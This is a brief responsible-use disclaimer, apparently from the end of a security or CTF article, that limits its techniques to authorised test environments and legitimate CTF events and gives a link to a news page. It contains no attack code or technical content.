The techniques in this article apply only to authorised test environments or legitimate CTF events. Do not test any system without authorisation. The road to security begins with compliance and ends with responsibility.

http://www.jsqmd.com/news/675409/
